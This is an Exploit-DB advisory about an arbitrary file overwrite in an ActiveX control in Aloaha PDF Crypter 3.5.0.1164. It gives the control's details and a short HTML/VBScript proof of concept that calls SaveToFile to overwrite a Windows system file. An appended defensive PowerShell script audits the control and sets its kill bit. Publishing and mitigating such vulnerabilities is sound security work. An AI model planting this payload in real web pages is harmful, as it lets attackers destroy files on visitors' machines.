Aloaha PDF Crypter (3.5.0.1164) – ActiveX Arbitrary File Overwrite

  • Author: shinnai
    Date: 2013-01-24
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/24319/
  • -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    ============================================================================================
     TITLE:
    ============================================================================================
     Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite
    
     url: http://www.aloaha.com/
     download: http://www.aloaha.com/download/aloaha_crypter.zip
     author: shinnai (http://shinnai.altervista.org)
    ============================================================================================
     FILE INFO:
    ============================================================================================
     File: C:\WINDOWS\system32\vbCrypt.dll
     InternalName: ebCrypt
     OriginalFilename: ebCrypt.DLL
     FileVersion: 2.0.0.2087
     FileDescription: ebCrypt Main Module
     Product: ebCrypt
     ProductVersion: 2.0.0.2087
     Language: English (United States)
     MD5 hash: b262cb93c555c3c9604502d071a783ec
    ============================================================================================
     ACTIVEX INFO:
    ============================================================================================
     ProgID: EbCrypt.eb_c_PRNGenerator.1
     GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C}
     Description: eb_c_PRNGenerator Class
     Safety report:
     RegKey Safe for Script: False
     RegKey Safe for Init: False
     Implements IObjectSafety: True
     IDisp Safe:Safe for untrusted: caller,data
    ============================================================================================
     BUG:
    ============================================================================================
     This ActiveX control exposes the "SaveToFile" method, which could be used to overwrite
     arbitrary files on users' PCs.
    ============================================================================================
     PROOF OF CONCEPT
    ============================================================================================
     <html>
    <object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object>
    <script language='vbscript'>
     test.SaveToFile "c:\windows\_system.ini"
    </script>
     </html>
    ============================================================================================
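Added example, not part of the original advisory: a PowerShell audit that reports whether the control with the advisory's CLSID is registered and whether the Internet Explorer kill bit is set for it, and sets the kill bit when asked. The registry locations and the 0x400 flag are the standard Windows ones; the `-Apply` switch is defined by this script, which is assumed to run elevated from a native (not 32-bit) PowerShell host.

```powershell
# Added example: audit / set the IE kill bit for the CLSID named in the advisory.
param([switch]$Apply)    # without -Apply the script only reports

$Clsid   = '{B1E7505E-BBFD-42BF-98C9-602205A1504C}'   # from the advisory
$KillBit = 0x400                                       # COMPAT_EVIL_DONT_LOAD

# Native and 32-bit (WOW64) registry views; the browser reads the view
# that matches its own bitness, so both are checked.
$Roots = 'HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\WOW6432Node'

foreach ($root in $Roots) {
    if (-not (Test-Path $root)) { continue }   # no WOW6432Node on 32-bit Windows

    $classKey  = Join-Path $root "Classes\CLSID\$Clsid"
    $compatKey = Join-Path $root "Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"

    # Is the COM class registered in this view at all?
    $registered = Test-Path $classKey

    # Read the current Compatibility Flags value, if one exists.
    $flags = 0
    if (Test-Path $compatKey) {
        $prop = Get-ItemProperty -Path $compatKey -Name 'Compatibility Flags' `
                                 -ErrorAction SilentlyContinue
        if ($prop) { $flags = $prop.'Compatibility Flags' }
    }
    $killed = ($flags -band $KillBit) -ne 0

    if ($Apply -and -not $killed) {
        if (-not (Test-Path $compatKey)) {
            New-Item -Path $compatKey -Force | Out-Null
        }
        # Preserve any flags already present and add the kill bit.
        $flags = $flags -bor $KillBit
        Set-ItemProperty -Path $compatKey -Name 'Compatibility Flags' `
                         -Value $flags -Type DWord
        $killed = $true
    }

    [pscustomobject]@{
        View       = $root
        Registered = $registered
        Flags      = '0x{0:X8}' -f $flags
        KillBitSet = $killed
    }
}
```

A row with `Registered = True` and `KillBitSet = False` marks a view in which the browser can still instantiate the control.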